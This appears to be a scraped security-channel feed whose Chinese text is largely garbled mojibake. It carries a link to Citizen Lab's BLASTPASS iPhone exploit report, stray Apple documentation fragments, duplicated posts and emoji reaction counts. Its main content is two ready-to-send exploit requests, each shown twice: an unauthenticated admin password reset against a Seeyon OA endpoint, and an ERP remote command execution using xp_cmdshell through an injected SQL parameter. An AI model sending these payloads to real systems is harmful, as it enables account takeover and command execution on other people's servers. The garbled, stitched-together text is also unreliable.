BLASTPASS NSO้ๅขiPhone้ถ็นๅป๏ผ0day ๆผๆดๅจ้ๅคๆ่ท
ไธๅจ๏ผ่ๆฃๆฅ็ฑๅ็้กฟ็นๅบ็ๆฐ้ด็คพไผ็ป็ปไธๅฝ้ ๅไบๅค้็จ็ไธชไบบ็่ฎพๅค๏ผๅ ฌๆฐๅฎ้ชๅฎคๅ็ฐไบไธไธช็งฏๆๅฉ็จ้ถ็นๅปๆผๆด่ขซ็จๆฅๆไพNSO้ๅข็้ฃ้ฉฌ้ไฝฃๅ้ด่ฐ่ฝฏไปถใ
BLASTPASSๆผๆดๅฉ็จ้พ
ๆไปฌๅฐๆผๆดๅฉ็จ้พ็งฐไธบBLASTPASSใ่ฏฅๆผๆด้พ่ฝๅคๅจๅๅฎณ่ ๆฒกๆไปปไฝไบคไบ็ๆ ๅตไธๅฑๅ่ฟ่กiOSๆๆฐ็ๆฌ๏ผ16.6๏ผ็iPhone .
ๆๆถๅ็ๆผๆดๅธๆฏๅก้ไปถๅ ๅซไปๆปๅป่ iMessage Accountๅ้็ปๅๅฎณ่ ็ๆถๆๅพๅใ
ๆไปฌๆๆๅจๆชๆฅๅๅธไธไธชๆด่ฏฆ็ป็ๅ ณไบๆผๆดๅฉ็จ้พ็่ฎจ่ฎบใ
https://citizenlab.ca/2023/09/blastpass-nso-group-iphone-zero-click-zero-day-exploit-captured-in-the-wild/
ไธๅจ๏ผ่ๆฃๆฅ็ฑๅ็้กฟ็นๅบ็ๆฐ้ด็คพไผ็ป็ปไธๅฝ้ ๅไบๅค้็จ็ไธชไบบ็่ฎพๅค๏ผๅ ฌๆฐๅฎ้ชๅฎคๅ็ฐไบไธไธช็งฏๆๅฉ็จ้ถ็นๅปๆผๆด่ขซ็จๆฅๆไพNSO้ๅข็้ฃ้ฉฌ้ไฝฃๅ้ด่ฐ่ฝฏไปถใ
BLASTPASSๆผๆดๅฉ็จ้พ
ๆไปฌๅฐๆผๆดๅฉ็จ้พ็งฐไธบBLASTPASSใ่ฏฅๆผๆด้พ่ฝๅคๅจๅๅฎณ่ ๆฒกๆไปปไฝไบคไบ็ๆ ๅตไธๅฑๅ่ฟ่กiOSๆๆฐ็ๆฌ๏ผ16.6๏ผ็iPhone .
ๆๆถๅ็ๆผๆดๅธๆฏๅก้ไปถๅ ๅซไปๆปๅป่ iMessage Accountๅ้็ปๅๅฎณ่ ็ๆถๆๅพๅใ
ๆไปฌๆๆๅจๆชๆฅๅๅธไธไธชๆด่ฏฆ็ป็ๅ ณไบๆผๆดๅฉ็จ้พ็่ฎจ่ฎบใ
https://citizenlab.ca/2023/09/blastpass-nso-group-iphone-zero-click-zero-day-exploit-captured-in-the-wild/
Apple Developer Documentation
Building a Pass | Apple Developer Documentation
Build a distributable pass.
โค7๐7๐ฅ1
่ด่ฟ ็ญไฟก้ช่ฏ็ ็ป่ฟ้็ฝฎๅฏ็ ๆผๆด POC
POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1 Host: ip:port
Content-Type: application/json
Accept-Encoding: gzip
{"loginName":"admin"}
POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1 Host: ip:port
Content-Type: application/json
Accept-Encoding: gzip
{"loginName":"admin"}
๐16โค2๐1
๐ฅ๐ฅ๐ฅ๐ฅ๐ฅ๐ฅ๐ฅ๐ฅ๐ฅ๐ฅ๐ฅ๐ฅ๐ฅ๐ฅ๐ฅ๐ฅ๐ฅ๐ฅ๐ฅ๐ฅ๐ฅ๐ฅ๐ฅ๐ฅ๐ฅ๐ฅ๐ฅ๐ฅ๐ฅ๐ฅ
โก1โค1
๐21โค4๐ฅ4๐3๐2๐1
๐11๐6๐คก2โค1๐ฅฐ1
ไผๆERP็ณป็ป RCE
POST /mainFunctions/comboxstore.action HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
comboxsql=exec%20xp_cmdshell%20'whoami'
POST /mainFunctions/comboxstore.action HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
comboxsql=exec%20xp_cmdshell%20'whoami'
๐10โค5